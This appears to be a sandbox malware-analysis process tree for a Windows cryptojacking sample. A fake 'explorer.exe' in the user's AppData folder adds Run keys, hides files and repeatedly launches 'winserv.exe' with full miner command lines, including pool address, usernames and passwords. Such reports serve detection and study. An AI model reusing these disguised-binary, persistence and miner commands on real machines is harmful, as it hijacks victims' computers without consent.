C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4832
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4344
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4776 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2064
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:836 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:760
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:2312 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:1640 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:976 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2792
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:3732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3124
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Adds Run key to start application
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4364
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4584
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1844 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1728
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4444
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1828
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1232 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:736
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:324
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:452
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:920
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3476
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1392
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2700
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4952
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4524
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:400
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4120
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4584
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:64
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3156
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5000
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4464
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1452
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:324
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3892
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5032
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:664
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2416
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:220
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3332
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3500
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4764
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4164
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3628
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2940
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2824
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2996
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4836
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1856
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1236
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:692
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2156
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5104
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:440
-
-
